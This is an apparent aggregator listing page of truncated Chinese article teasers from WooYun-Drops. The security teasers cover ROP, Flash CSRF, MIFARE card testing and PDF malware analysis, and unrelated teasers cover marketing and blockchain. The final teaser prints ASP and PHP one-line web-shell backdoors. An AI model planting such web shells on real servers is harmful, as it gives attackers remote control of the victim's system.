http://drops.wooyun.org/tips/6597 0x00 序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用...
WooYun-Drops
WooYun-Drops
风土人情
从“蓝翔”感悟中国最接地气的营销:屌丝逆袭
虎嗅注:“蓝翔”在中国技工学校界乃至整个网络营销界,都成了神一般的存在。网上,人们会自发地在各种文案与段子后面加一句“挖掘机到底哪家强”?这时受众脑子里会不受控制地跳出一句:中国山东找蓝翔!“蓝翔”之...
业界关注
杭州,一个区块链“荷尔蒙”爆发之都
华尔街有句名言:“金钱永不眠”。春节开始,中国互联网圈开始出现“区块链疯狂到失眠”,“凌晨3点”微信群推波助澜,各种投资大佬、创业明星以及影视演员“夜夜笙歌”,把“区块链美好前程”之歌唱红了大江南北。...
神兵利刃
使用Proxmark3进行MIFARE Classic卡的安全测试
Proxmark3的MIFARE安全测试是很多朋友都非常重视的一部分,所以我们特地以这个部分进行介绍,告诉大家如何当你完成前期操作之后,进行MIFARE CLassic卡类的安全测试操作。 首先,我们...
访问phpmyadmin页面空白处理方法
访问phpmyadmin页面空白处理方法在VPS中使用lnmp,nginx设置了伪静态后,无法通过路径http://localhost/phpmyadmin 访问解决方法:直接在链接后加上i...
Flash CSRF – _Dy
http://drops.wooyun.org/tips/688 目录 0x00 Flash CSRF 名词解释 0x01 Flash CSRF形成的原因 0x02 Flash CSRF可以干些什么 ...
风土人情
春运的前世今生
虎嗅注:今天的你可能正在回家路上,也经历了开票瞬间就“秒光”的场面。可直到20世纪最初的几年,鲁迅从北京回到绍兴全程需要86个小时。而即便如此,对于普通人来说,这样长距离出行的花费也是天文数字;直到2...
Elasticsearch集群的备份与恢复 – rootsecurity
http://drops.wooyun.org/tips/12673 0x00 NFS准备 在ES集群上做一个NFS,并挂载: # yum install nfs-utils* # vi /etc/e...
神兵利刃
PDF恶意文档分析-PDFScope
PDFScope是一个用wxPython写的GUI,即为 Dider Stevens的PDFiD.pf和pdf-parser.py (http://blog.didierstevens.com/pro...
一句话木马(asp,php) 总结篇
asp一句话 <%execute(request("1"))%> php一句话 <?php eval($_POST);?> aspx一句话 <scri...
